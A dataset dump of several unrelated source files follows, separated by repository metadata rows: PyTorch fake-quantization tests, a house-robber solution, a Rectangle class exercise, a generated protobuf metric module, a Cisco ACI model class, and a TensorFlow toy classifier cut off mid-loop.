X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_py_module_backward_per_channel(self, device, X):
r"""Tests the forward path of the _LearnableFakeQuantizePerChannel op.
"""
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device).float()
X.requires_grad_()
scale = to_tensor(scale, device).float()
scale.requires_grad_()
zero_point = torch.tensor(zero_point).to(device).float()
zero_point.requires_grad_()
Y_prime = _LearnableFakeQuantizePerChannelOp.apply(
X, scale, zero_point, axis, quant_min, quant_max, 1.).to(device)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX, dScale, dZeroPoint = _fake_quantize_learnable_per_channel_affine_grad_reference(
dout, X, scale, zero_point, axis, quant_min, quant_max, device)
Y_prime.backward(dout)
dX_expected = dX.to(device).detach()
dX_actual = X.to(device).grad.detach()
dScale_expected = dScale.to(device).detach()
dScale_actual = scale.to(device).grad.detach()
dZeroPoint_expected = dZeroPoint.to(device).detach()
dZeroPoint_actual = zero_point.to(device).grad.detach()
tolerance = 1e-2
self.assertTrue(
torch.allclose(dX_expected, dX_actual, rtol=tolerance, atol=tolerance),
"Expected dX to match X.grad")
self.assertTrue(
torch.allclose(dScale_expected, dScale_actual, rtol=tolerance, atol=tolerance),
"Expected dScale to match scale.grad")
self.assertTrue(
torch.allclose(dZeroPoint_expected, dZeroPoint_actual, rtol=tolerance, atol=tolerance),
"Expected dZeroPoint to match zero_point.grad")
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skip("temporarily disable the test")
def test_numerical_consistency_per_channel(self, device, X):
r"""Comparing numerical consistency between CPU quantize/dequantize op and the CPU fake quantize op
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
scale = to_tensor(scale, device)
zero_point = torch.tensor(zero_point).to(dtype=torch.int64, device=device)
# quantize_linear and dequantize are only implemented in CPU
Y = torch.dequantize(torch.quantize_per_channel(X.cpu(), scale.cpu(), zero_point.cpu(), axis, torch_type))
Y_prime = torch.fake_quantize_per_channel_affine(
X, scale, zero_point, axis, quant_min, quant_max)
np.testing.assert_allclose(Y, Y_prime.cpu(), rtol=tolerance, atol=tolerance)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
qparams=hu.qparams(dtypes=torch.qint8)))
def test_fq_module(self, device, X):
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
X.requires_grad_()
fq_module = FakeQuantize(default_per_channel_weight_observer, quant_min, quant_max, ch_axis=axis).to(device)
Y_prime = fq_module(X)
assert fq_module.scale is not None
assert fq_module.zero_point is not None
Y = _fake_quantize_per_channel_affine_reference(X, fq_module.scale,
fq_module.zero_point, axis, quant_min, quant_max)
np.testing.assert_allclose(Y.cpu().detach().numpy(), Y_prime.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
# Test backward
dout = torch.rand(X.shape, dtype=torch.float, device=device)
Y_prime.backward(dout)
dX = _fake_quantize_per_channel_affine_grad_reference(dout, X, fq_module.scale,
fq_module.zero_point, axis, quant_min, quant_max)
np.testing.assert_allclose(dX.cpu().numpy(), X.grad.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
def test_fq_serializable(self):
observer = default_per_channel_weight_observer
quant_min = -128
quant_max = 127
fq_module = FakeQuantize(observer, quant_min, quant_max)
X = torch.tensor([[-5, -3.5, -2, 0, 3, 5, 7], [1, 3, 2, 5, 6.5, 8, 10]], dtype=torch.float32)
y_ref = fq_module(X)
state_dict = fq_module.state_dict()
self.assertEqual(state_dict['scale'], [0.054902, 0.078431])
self.assertEqual(state_dict['zero_point'], [0, 0])
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_dict[key])
def _get_buffer_ids(module):
"""
Object addresses stay constant if and only if all modifications are in-place
"""
return [id(v) for k, v in module._buffers.items()]
class TestDistributed(QuantizationTestCase):
def test_observers_preserve_buffers(self):
"""
Tests that observers only modify buffers in place. Note: this is important
because nn.DataParallel depends on this assumption to work correctly.
However, DataParallel does not expose IDs of the replicas, so we test it
without DataParallel in order to easily access the object IDs.
"""
observer_types = [
torch.quantization.MinMaxObserver.with_args(dtype=torch.qint8),
torch.quantization.MovingAverageMinMaxObserver.with_args(dtype=torch.qint8),
torch.quantization.MinMaxDynamicQuantObserver.with_args(dtype=torch.qint8),
torch.quantization.PerChannelMinMaxObserver.with_args(dtype=torch.qint8),
torch.quantization.MovingAveragePerChannelMinMaxObserver.with_args(dtype=torch.qint8),
torch.quantization.HistogramObserver.with_args(dtype=torch.qint8),
torch.quantization.RecordingObserver.with_args(dtype=torch.qint8),
torch.quantization.PlaceholderObserver.with_args(dtype=torch.float16),
]
for observer_type in observer_types:
observer = observer_type()
buffer_ids_before = _get_buffer_ids(observer)
for _i in range(5):
inputs = torch.rand((4, 4, 4))
observer(inputs)
buffer_ids_after = _get_buffer_ids(observer)
self.assertEqual(
buffer_ids_before,
buffer_ids_after,
msg="{}: Buffers must be modified in place".format(str(observer)))
def test_fake_quant_preserves_buffers(self):
"""
Tests that fake quant only modifies buffers in place. Note: this is important
because nn.DataParallel depends on this assumption to work correctly.
However, DataParallel does not expose IDs of the replicas, so we test it
without DataParallel in order to easily access the object IDs.
"""
model = torch.quantization.FakeQuantize()
buffer_ids_before = _get_buffer_ids(model)
for _i in range(5):
inputs = torch.rand((4, 4, 4))
model(inputs)
model.apply(torch.quantization.enable_fake_quant)
model.apply(torch.quantization.disable_fake_quant)
model.apply(torch.quantization.enable_observer)
model.apply(torch.quantization.disable_observer)
buffer_ids_after = _get_buffer_ids(model)
self.assertEqual(
buffer_ids_before,
buffer_ids_after,
msg="FakeQuant: Buffers must be modified in place")
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_qat_data_parallel(self):
"""
Tests that doing QAT in nn.DataParallel does not crash.
"""
if 'fbgemm' not in torch.backends.quantized.supported_engines:
return
with override_quantized_engine('fbgemm'):
device = torch.device('cuda')
model = nn.Sequential(
torch.quantization.QuantStub(),
nn.Conv2d(3, 1, 1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
nn.Conv2d(1, 2, 3, stride=2, padding=1, bias=False),
nn.BatchNorm2d(2),
nn.AvgPool2d(14),
nn.Sigmoid(),
torch.quantization.DeQuantStub(),
)
torch.quantization.fuse_modules(model, [['1', '2', '3'], ['4', '5']], inplace=True)
model.qconfig = torch.quantization.get_default_qat_qconfig('fbgemm')
torch.quantization.prepare_qat(model, inplace=True)
model = nn.DataParallel(model, device_ids=[0, 1])
model.to(device)
model.train()
for epoch in range(3):
inputs = torch.rand(2, 3, 28, 28).to(device)
model(inputs)
if epoch >= 1:
model.apply(torch.quantization.disable_observer)
if epoch >= 2:
model.apply(torch.nn.intrinsic.qat.freeze_bn_stats)
quant_model = copy.deepcopy(model.module)
quant_model = torch.quantization.convert(quant_model.eval().cpu(), inplace=False)
with torch.no_grad():
out = quant_model(torch.rand(1, 3, 28, 28))
def test_qat_convbn_fused_syncbn_replacement(self):
"""
Tests that SyncBatchNorm replacement works for fused ConvBN.
"""
if 'fbgemm' not in torch.backends.quantized.supported_engines:
return
with override_quantized_engine('fbgemm'):
# create conv-bn
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.conv = nn.Conv2d(4, 1, 3, padding=1)
self.bn = nn.BatchNorm2d(1)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return x
model = Model()
# fuse it
fused_model = torch.quantization.fuse_modules(
model,
[['conv', 'bn']],
)
# convert to QAT
fused_model.qconfig = torch.quantization.get_default_qconfig('fbgemm')
torch.quantization.prepare_qat(fused_model, inplace=True)
# replace with DDP
fused_model = nn.SyncBatchNorm.convert_sync_batchnorm(fused_model)
self.assertTrue(
isinstance(fused_model.conv.bn, nn.SyncBatchNorm),
"Expected BN to be converted to SyncBN")
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@override_qengines
def test_device_affinity(self):
"""
Tests that converting a model to QAT respects device affinity
"""
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.conv = nn.Conv2d(1, 1, 1)
self.bn = nn.BatchNorm2d(1)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
model = Model()
model.qconfig = torch.quantization.get_default_qat_qconfig(torch.backends.quantized.engine)
device = torch.device('cuda:0')
model.to(device)
torch.quantization.prepare_qat(model, inplace=True)
model_devices = {p.device for p in model.parameters()} | \
{p.device for p in model.buffers()}
self.assertEqual(len(model_devices), 1)
model_device = next(iter(model_devices))
self.assertEqual(model_device, device)
# ensure that running an input on CUDA works without any needed changes
input = torch.randn(4, 1, 4, 4, device=device)
model(input)
| [
"[email protected]"
] | |
576e761485b9b3fbcdc1ce8d9b9405d34e242c90 | a1ad2715e306fd4e7eaeda5348e00e1a363e7884 | /leetcode/concepts.py/houserobber2.py | d7ea4c294868b76061a7f6960164e761560f91cc | [] | no_license | MayankMaheshwar/DS-and-Algo-solving | cef54a800b3e8a070a707f97b4f30fccaa17d5c6 | ac6ea8f880920242a55d40c747368d68cb6f7534 | refs/heads/master | 2022-12-07T07:55:08.380505 | 2022-12-05T09:32:14 | 2022-12-05T09:32:14 | 237,103,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | def robberse(self, nums):
def simple_rob(nums, i, j):
rob, not_rob = 0, 0
for idx in range(i, j):
num = nums[idx]
rob, not_rob = not_rob + num, max(rob, not_rob)
return max(rob, not_rob)
if not nums:
return 0
elif len(nums) == 1:
return nums[0]
else:
n = len(nums)
return max(simple_rob(nums, 1, n), simple_rob(nums, 0, n-1)) | [
"[email protected]"
] | |
196a8d28085738fdda38ea2f078b8fb542ec2300 | 189c99816118ac6334fb65f1ef611c71eb756ead | /0x08-python-more_classes/6-rectangle.py | 76a2c927a7745e18c819895c16ccb3f69c5e9f0f | [] | no_license | MadmanSilver/holbertonschool-higher_level_programming | 4d51e308636ccc37271869dd830f700d8201948e | 09e47b319d9bd674519b13263a74822198d5932c | refs/heads/master | 2022-12-18T23:40:37.862157 | 2020-09-25T02:41:01 | 2020-09-25T02:41:01 | 259,349,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,083 | py | #!/usr/bin/python3
""" Contains the Rectangle class. """
class Rectangle:
""" Defines a rectangle. """
number_of_instances = 0
def __init__(self, width=0, height=0):
""" Sets up the rectangle instance. """
self.width = width
self.height = height
Rectangle.number_of_instances += 1
@property
def width(self):
""" Width of the rectangle. """
return self.__width
@width.setter
def width(self, value):
""" Sets the width of the rectangle. """
if type(value) is not int:
raise TypeError("width must be an integer")
if value < 0:
raise ValueError("width must be >= 0")
self.__width = value
@property
def height(self):
""" Height of the rectangle. """
return self.__height
@height.setter
def height(self, value):
""" Sets the height of the rectangle. """
if type(value) is not int:
raise TypeError("height must be an integer")
if value < 0:
raise ValueError("height must be >= 0")
self.__height = value
def area(self):
""" Calculates the area of the rectangle. """
return self.width * self.height
def perimeter(self):
""" Calculates the perimeter of the rectangle. """
if self.width == 0 or self.height == 0:
return 0
return self.width * 2 + self.height * 2
def __str__(self):
""" Returns a string representation of the rectangle. """
res = ""
if self.width == 0:
return res
for y in range(self.height):
res += "#" * self.width
if y + 1 != self.height:
res += "\n"
return res
def __repr__(self):
""" Returns a string that can be used with eval to duplicate. """
return "Rectangle({}, {})".format(self.width, self.height)
def __del__(self):
""" Prints a message when rectangle is deleted. """
print("Bye rectangle...")
Rectangle.number_of_instances -= 1
| [
"[email protected]"
] | |
abd67ca206bbbefe8db51c4120f1011c9b6a16a1 | bc441bb06b8948288f110af63feda4e798f30225 | /webshell_sdk/model/collector_service/alias_metric_with_one_original_metric_pb2.py | 4cb5fc609cbe47718128bc79d754b117d6e91800 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 9,177 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: alias_metric_with_one_original_metric.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from webshell_sdk.model.collector_service import metric_pb2 as webshell__sdk_dot_model_dot_collector__service_dot_metric__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='alias_metric_with_one_original_metric.proto',
package='collector_service',
syntax='proto3',
serialized_options=_b('ZKgo.easyops.local/contracts/protorepo-models/easyops/model/collector_service'),
serialized_pb=_b('\n+alias_metric_with_one_original_metric.proto\x12\x11\x63ollector_service\x1a\x31webshell_sdk/model/collector_service/metric.proto\"\xb5\x03\n*CollectorAliasMetricWithOneOiriginalMetric\x12\x15\n\rcalculateOnly\x18\x01 \x01(\x08\x12;\n\x0f\x63ollectorMetric\x18\x02 \x01(\x0b\x32\".collector_service.CollectorMetric\x12T\n\rdependMetrics\x18\x03 \x03(\x0b\x32=.collector_service.CollectorAliasMetricWithOneOiriginalMetric\x12\x12\n\ninstanceId\x18\x04 \x01(\t\x12\x0c\n\x04name\x18\x05 \x01(\t\x12P\n\x04\x64ims\x18\x06 \x03(\x0b\x32\x42.collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims\x12\x0f\n\x07version\x18\x07 \x01(\x05\x12\x14\n\x0cisCalculated\x18\x08 \x01(\x08\x12\x12\n\nexpression\x18\t \x01(\t\x1a.\n\x04\x44ims\x12\x0f\n\x07\x64imName\x18\x01 \x01(\t\x12\x15\n\roriginDimName\x18\x02 \x01(\tBMZKgo.easyops.local/contracts/protorepo-models/easyops/model/collector_serviceb\x06proto3')
,
dependencies=[webshell__sdk_dot_model_dot_collector__service_dot_metric__pb2.DESCRIPTOR,])
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS = _descriptor.Descriptor(
name='Dims',
full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='dimName', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims.dimName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='originDimName', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims.originDimName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=509,
serialized_end=555,
)
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC = _descriptor.Descriptor(
name='CollectorAliasMetricWithOneOiriginalMetric',
full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='calculateOnly', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.calculateOnly', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='collectorMetric', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.collectorMetric', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dependMetrics', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.dependMetrics', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.instanceId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.name', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dims', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.dims', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='version', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.version', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isCalculated', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.isCalculated', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='expression', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.expression', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=118,
serialized_end=555,
)
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS.containing_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['collectorMetric'].message_type = webshell__sdk_dot_model_dot_collector__service_dot_metric__pb2._COLLECTORMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['dependMetrics'].message_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['dims'].message_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS
DESCRIPTOR.message_types_by_name['CollectorAliasMetricWithOneOiriginalMetric'] = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CollectorAliasMetricWithOneOiriginalMetric = _reflection.GeneratedProtocolMessageType('CollectorAliasMetricWithOneOiriginalMetric', (_message.Message,), {
'Dims' : _reflection.GeneratedProtocolMessageType('Dims', (_message.Message,), {
'DESCRIPTOR' : _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS,
'__module__' : 'alias_metric_with_one_original_metric_pb2'
# @@protoc_insertion_point(class_scope:collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims)
})
,
'DESCRIPTOR' : _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC,
'__module__' : 'alias_metric_with_one_original_metric_pb2'
# @@protoc_insertion_point(class_scope:collector_service.CollectorAliasMetricWithOneOiriginalMetric)
})
_sym_db.RegisterMessage(CollectorAliasMetricWithOneOiriginalMetric)
_sym_db.RegisterMessage(CollectorAliasMetricWithOneOiriginalMetric.Dims)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
181a25b998b188559a7c17997e8ce525d68a3cf4 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/fv/aeppconfissues.py | c23c2662a913b2fdb31f332c39cb53a959687641 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 6,453 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AEpPConfIssues(Mo):
meta = ClassMeta("cobra.model.fv.AEpPConfIssues")
meta.isAbstract = True
meta.moClassName = "fvAEpPConfIssues"
meta.moClassName = "fvAEpPConfIssues"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstraction of EpP Configuration Issues"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.fv.RsStPathAtt")
meta.parentClasses.add("cobra.model.fv.AEPgCont")
meta.parentClasses.add("cobra.model.fv.ExtStPathAtt")
meta.parentClasses.add("cobra.model.fv.RsStGrpAtt")
meta.parentClasses.add("cobra.model.fv.RsNodePortAtt")
meta.parentClasses.add("cobra.model.fv.InBEpP")
meta.parentClasses.add("cobra.model.vz.ToEPgAny")
meta.parentClasses.add("cobra.model.vz.ToEPg")
meta.parentClasses.add("cobra.model.fv.RtdEpP")
meta.parentClasses.add("cobra.model.fv.Locale")
meta.parentClasses.add("cobra.model.fv.AttEntityPathAtt")
meta.parentClasses.add("cobra.model.fv.StPathAtt")
meta.parentClasses.add("cobra.model.fv.DyPathAtt")
meta.parentClasses.add("cobra.model.fv.ConfigState")
meta.parentClasses.add("cobra.model.fv.EpP")
meta.parentClasses.add("cobra.model.fv.OoBEpP")
meta.parentClasses.add("cobra.model.fv.BrEpP")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.fv.AConfIssues")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.superClasses.add("cobra.model.pol.AConfIssues")
meta.concreteSubClasses.add("cobra.model.fv.NwIssues")
meta.concreteSubClasses.add("cobra.model.fv.StorageIssues")
meta.concreteSubClasses.add("cobra.model.fv.CompIssues")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "configSt", "configSt", 4993, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "not-applied"
prop._addConstant("applied", "applied", 2)
prop._addConstant("applying", "applying", 1)
prop._addConstant("failed-to-apply", "failed-to-apply", 3)
prop._addConstant("not-applied", "not-applied", 0)
prop._addConstant("temp-failed-to-apply", "temp-failed-to-apply", 4)
meta.props.add("configSt", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "epgPKey", "epgPKey", 1831, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("epgPKey", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "temporaryError", "temporaryError", 16106, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("temporaryError", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
97208d08e04cecb91c78591585387c2390b581fd | 90333a3140dc20036ad1ae88aaeec4b72a93914b | /tensorflow/example04.py | 8c309c32db68466a1c8c20d8d572042450f9d5a6 | [] | no_license | jw0831/AI-Study | 1f026acbc46a5f133921efc3c07d233ec1e8e284 | 02a2bd7469691facc5b6b283aa5edb8e90841456 | refs/heads/master | 2023-05-12T13:05:55.499517 | 2021-06-13T14:32:19 | 2021-06-13T14:32:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,679 | py | #(4) example04
#import tensorflow and numpy
import tensorflow as tf
import numpy as np
#[feather, wing]
x_data = np.array(
[[0, 0], [1, 0], [1, 1], [0, 0], [0, 0], [0, 1]])
#[etc, mammal, bird]
#one-hot encoding(label)
y_data = np.array([
[1, 0, 0], #etc
[0, 1, 0], #mammal
[0, 0, 1], #bird
[1, 0, 0],
[1, 0, 0],
[0, 0, 1]
])
#make simple model
#make placeholder
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
#input size is 2, output size is 3
weight1 = tf.Variable(tf.random_uniform([2, 10], -1., 1.))
weight2 = tf.Variable(tf.random_uniform([10, 3], -1., 1.))
bias1 = tf.Variable(tf.zeros([10]))
bias2 = tf.Variable(tf.zeros([3]))
#activation function
layer1 = tf.add(tf.matmul(X, weight1), bias1)
layer2 = tf.nn.relu(layer1)
model = tf.add(tf.matmul(layer1, weight2), bias2)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=model))
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
train_op = optimizer.minimize(cost)
#training
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for step in range(100):
sess.run(train_op, feed_dict={X: x_data, Y: y_data})
if (step + 1) % 10 == 0:
